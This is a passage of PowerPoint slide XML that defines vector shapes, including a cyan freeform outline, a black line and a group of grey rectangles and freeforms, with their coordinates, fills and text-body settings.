              <a:gd name="T78" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T104" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T105" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T106" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T107" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T108" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T109" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T110" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T111" fmla="*/ 2147483647 h 7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98"/>
              <a:gd name="T169" fmla="*/ 0 h 719"/>
              <a:gd name="T170" fmla="*/ 1198 w 1198"/>
              <a:gd name="T171" fmla="*/ 719 h 71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98" h="719">
                <a:moveTo>
                  <a:pt x="1160" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1154" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1149" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1142" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="875" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="817" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="655" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206" y="138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101" y="651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110" y="656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119" y="659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272" y="685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295" y="686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342" y="692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="377" y="697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389" y="698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439" y="704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576" y="714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604" y="715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="763" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="791" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="801" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809" y="718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="816" y="718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824" y="718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865" y="713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876" y="712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="900" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910" y="705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="931" y="700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="953" y="693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965" y="691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002" y="679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015" y="676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029" y="672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1070" y="662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083" y="657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096" y="652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120" y="641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1142" y="627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152" y="620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160" y="610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165" y="606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1168" y="601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174" y="590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180" y="579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1184" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1188" y="554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1191" y="541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194" y="527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1198" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1198" y="219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1198" y="192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1197" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1191" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1188" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1186" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1169" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160" y="13"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10452" name="Line 533"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5029200" y="7315200"/>
            <a:ext cx="2095500" cy="22225"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10453" name="Group 534"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6958012" y="6657975"/>
            <a:ext cx="627063" cy="1557338"/>
            <a:chOff x="2550" y="2912"/>
            <a:chExt cx="278" cy="690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10486" name="Freeform 535"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2578" y="2963"/>
              <a:ext cx="138" cy="638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 138"/>
                <a:gd name="T1" fmla="*/ 485 h 638"/>
                <a:gd name="T2" fmla="*/ 138 w 138"/>
                <a:gd name="T3" fmla="*/ 638 h 638"/>
                <a:gd name="T4" fmla="*/ 138 w 138"/>
                <a:gd name="T5" fmla="*/ 77 h 638"/>
                <a:gd name="T6" fmla="*/ 116 w 138"/>
                <a:gd name="T7" fmla="*/ 49 h 638"/>
                <a:gd name="T8" fmla="*/ 0 w 138"/>
                <a:gd name="T9" fmla="*/ 0 h 638"/>
                <a:gd name="T10" fmla="*/ 0 w 138"/>
                <a:gd name="T11" fmla="*/ 485 h 638"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 138"/>
                <a:gd name="T19" fmla="*/ 0 h 638"/>
                <a:gd name="T20" fmla="*/ 138 w 138"/>
                <a:gd name="T21" fmla="*/ 638 h 638"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="138" h="638">
                  <a:moveTo>
                    <a:pt x="0" y="485"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138" y="638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="485"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="606060"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10487" name="Rectangle 536"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716" y="3035"/>
              <a:ext cx="84" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E0E0E0"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10488" name="Freeform 537"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2713" y="3035"/>
              <a:ext cx="86" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 86"/>
                <a:gd name="T1" fmla="*/ 0 h 64"/>
                <a:gd name="T2" fmla="*/ 86 w 86"/>
                <a:gd name="T3" fmla="*/ 0 h 64"/>
                <a:gd name="T4" fmla="*/ 86 w 86"/>
                <a:gd name="T5" fmla="*/ 64 h 64"/>
                <a:gd name="T6" fmla="*/ 0 w 86"/>
                <a:gd name="T7" fmla="*/ 30 h 64"/>
                <a:gd name="T8" fmla="*/ 0 w 86"/>
                <a:gd name="T9" fmla="*/ 0 h 64"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 86"/>
                <a:gd name="T16" fmla="*/ 0 h 64"/>
                <a:gd name="T17" fmla="*/ 86 w 86"/>
                <a:gd name="T18" fmla="*/ 64 h 64"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="86" h="64">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10489" name="Rectangle 538"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716" y="3118"/>
              <a:ext cx="41"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490" name="Rectangle 539"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3117"/>
              <a:ext cx="43" cy="34"/>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491" name="Rectangle 540"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2737" y="3080"/>
              <a:ext cx="43" cy="32"/>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492" name="Rectangle 541"/>
            <p:cNvSpPr>
